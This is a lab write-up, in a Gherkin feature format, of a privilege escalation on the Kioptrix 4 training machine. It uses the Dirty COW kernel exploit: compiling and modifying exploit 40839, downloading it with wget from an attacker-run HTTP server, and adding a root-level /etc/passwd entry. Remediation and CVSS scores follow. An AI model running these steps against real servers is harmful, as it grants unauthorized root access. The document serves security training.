## Version 1.4.1
## language: en

Feature:
  TOE:
    Kioptrix 4
  Category:
   Privilege Escalation
  Location:
    Kioptrix4
  CWE:
    CWE CATEGORY: OWASP Top Ten 2013 Category A9 - Using Components with Known
    Vulnerabilities
  Rule:
    REQ.269 Use principle of least privilege
  Goal:
    Executing command as root
  Recommendation:
    Update the server to the most recent version

  Background:
  Hacker's software:
    |<software name>       | <version>      |
    | Kali Linux           | 2018.3         |
    | OpenSSH              | 7.7p1          |
  TOE information:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials

  Scenario: Normal use case:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials
    Then I execute commands as a low privilege user

  Scenario: Static detection:
    Given I open the TOE
    Then I can see that the source code is inaccessible

  Scenario: Dynamic detection:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials
    Then I execute the following command
    """
    uname -a
    """
    And I see that the linux kernel version is "2.6.24-24"
    When I use the following command on kali
    """
    $ searchsploit linux 2.6
    ...
    Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition
    Privilege Escalation
    ...
    """
    Then I know that I can use that exploit to elevate privileges

  Scenario: Exploitation
    Given I am accessing the server 192.168.60.130 through SSH
    And I know that the kernel is vulnerable
    Then I download the exploit to my machine
    And compile it with the following
    """
    $ gcc -pthread 40839.c -o dirty -lcrypt
    """
    Then I execute it
    And copy the password hash that is going to be added to the /etc/passwd file
    """
    john2104:<HASH>:0:0:pwned:/root:/bin/bash
    """
    Then I modify the 40839.c exploit to the following
    """
    ...
    char *generate_password_hash(char *plaintext_pw) {
      return "<HASH>";
    }
    ...
    """
    And delete the following line
    """
    ...
    #include <crypt.h>
    ...
    """
    Then I compile it again
    And start a python HTTP server with
    """
    python -m SimpleHTTPServer 8000
    """
    When I download the file with wget
    And add execution permissions with
    """
    $ wget http://192.168.60.129:8000/dirty
    $ chmod +x
    """
    Then I execute it and follow the steps
    When it finishes I have a new user in the /etc/passwd file
    And I can access to the server with that user
    Then by running the following command I can see that I have a root user
    """
    $ id
    uid=0(john2104) gid=0(root) groups=0(root)
    """
    Then I can execute commands as root

  Scenario: Remediation
    Update the server to the most recent version

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.8/10 (High) -AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    8.8/10 (High) - E:H/RL:U/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.8/10 (High) - CR:H/IR:H/AR:H/MAV:L/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2020-04-03
